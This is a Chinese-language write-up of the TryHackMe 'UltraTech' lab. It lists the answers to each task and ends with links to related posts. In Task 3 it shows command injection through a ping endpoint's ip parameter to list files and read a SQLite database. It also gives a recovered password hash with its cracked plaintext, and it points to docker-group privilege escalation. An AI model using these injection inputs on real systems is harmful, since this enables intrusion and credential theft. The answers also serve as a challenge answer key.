UltraTech

文章目录

  • UltraTech
    • Task1 Deploy the machine
    • Task2 It's enumeration time!
    • Task3 Let the fun begin
    • Task4 The root of all evil

Task1 Deploy the machine

Deploy the machine

Task2 It’s enumeration time!

1.Which software is using the port 8081?

Node.js

2.Which other non-standard port is used?

31331

3.Which software using this port?

Apache

4.Which GNU/Linux distribution seems to be used?

Ubuntu

5.The software using the port 8080 is a REST api, how many of its routes are used by the web application?

2

Task3 Let the fun begin

1.There is a database lying around, what is its filename?

utech.db.sqlite

http://ip:8081/ping页面访问无法正常访问,缺少参数运行,在URL添加ip参数即可正常运行;

尝试在ip参数中写入命令,访问http://ip:8081/ping?ip=ls -la ,发现数据库文件utech.db.sqlite

2.What is the first user’s password hash?

f357a0c52799563c7c7b76c1e7543a32

运行http://ip:8081/ping?ip=cat utech.db.sqlite,发现root用户及admin用户hash

3.What is the password associated with this hash?

n100906

Task4 The root of all evil

What are the first 9 characters of the root user’s private SSH key?

MIIEogIBA

r00t用户属于docker组成员,可以利用docker提权

Tryhackme-UltraTech相关推荐

  1. TryHackMe学习笔记-Windows PrivEsc Arena

    文章目录 Task 1 Connecting to TryHackMe network Task 2 Deploy the vulnerable machine Task 3 Registry Esc ...

  2. tryhackme圣诞挑战2021-Advent of Cyber 3-day2-越权漏洞,修改cookie

    文章目录 背景 开始学习! HTTPS GET Cookies cookie的组成成分 操纵cookie 答题 背景 McSkidy需要检查其他员工是否被入侵了,但是员工的信息被黑了,你能修补回来然后 ...

  3. TryHackMe学习笔记-The Cod Caper

    文章目录 概述 端口扫描 80端口漏洞利用 Web页面访问 目录扫描 SQL注入 命令执行 - 初始立足点 敏感文件查找 LinEnum 提权 gdb 利用pwntools溢出 hashcat破解ha ...

  4. TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)

    文章目录 前期准备 Task1 Recon scan the mechine How many ports are open with a port number under 1000? What i ...

  5. TryHackMe新手村

    注册是需要谷歌的,需要特殊上网手段. TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6 ...

  6. SQL注入(基于 tryhackme 的讲解)

    一.什么是SQL注入 SQL注入攻击(SQL Injection),简称注入攻击.SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞.在设计程序时,忽略了对输入字符串中夹 ...

  7. 【Tryhackme】Hacker of the Hill #1

    免责声明 本文渗透的主机经过合法授权.本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责. ...

  8. Tryhackme blue

    前提 openvpn连入内网: 下载配置文件,链接内网后启动靶机 任务1 主机扫描 command:nmap -sV -vv --script vuln 10.10.78.216 任务2 启动msf ...

  9. Tryhackme -Skynet(考点:smb 密码爆破 cuppa RFI cronjob - tar提权)

    1 扫描 忘了截图了,就是445 smb和80http 重要,一个进去找敏感文件,另一个进去搜集信息. 2 web信息搜集 gobuster扫gobuster dir -u http://10.10. ...

  10. TryHackMe - Dav靶场

    Dav boot2root machine for FIT and bsides guatemala CTF 0x01 信息收集 常规Nmap扫描目标机器收集端口开放服务信息,只开放了一个端口 0x0 ...

最新文章

  1. 性能调优-SQL TRACE
  2. .net core 1.0 实现负载多服务器单点登录
  3. 鼬电脑壁纸_火影忍者高清壁纸需要自取1080p
  4. 3-1:类与对象入门——类的引入和类的定义以及访问限定符和封装还有对面向对象的理解
  5. 登录验证----滑块/拼图碎片/随机num
  6. 【KEIL-MDK】系列——如何使用PC-Lint代码检查工具
  7. 解决网页内容自制不了,文档复制需要VIP权益方法
  8. 经典的进程同步问题-----哲学家进餐问题详解
  9. 机器学习笔记 - AutoML框架FLAML初体验
  10. 推荐系统(十六)多任务学习:腾讯PLE模型(Progressive Layered Extraction model)
  11. 处理行内元素行内块元素中间空隙
  12. 最佳解决方法 Error: No such file or directory @ rb_sysopen
  13. c语言龟兔赛跑程序,c语言龟兔赛跑
  14. Bagging你真的懂吗
  15. SSL证书.key转.pem的方法
  16. Vue源码翻译之渲染逻辑链
  17. c语言有多难?一个新手刚学c语言的无奈
  18. GLES2.0中文API-glUseProgram
  19. 表示身体各部位的英语单词
  20. 思维题 URAL 1409 Two Gangsters

热门文章

  1. 凯屋qq速记员 下载
  2. ISO20000 服务目录
  3. CAS单点登录-第三方登录[QQ、微信、CSDN、GitHub](十四)
  4. C/C++中的字符串比较函数strcmp/memcmp/CString.Compare/CString:CompareNoCase
  5. Babylon.js 第27章 创建参数化网格
  6. Toast 吐司 提示框
  7. shell编程入门、shell编程的基础知识(变量、命令、运算)、shell编程的语句
  8. 广东移动爱家TV牌照UNT402H_MV310/MV300原厂分区全量备份包
  9. Jsp医院病区管理系统(论文+中期检查表+任务书+综合材料)
  10. [vSphere]ESXi异常断电导致虚拟机无法打开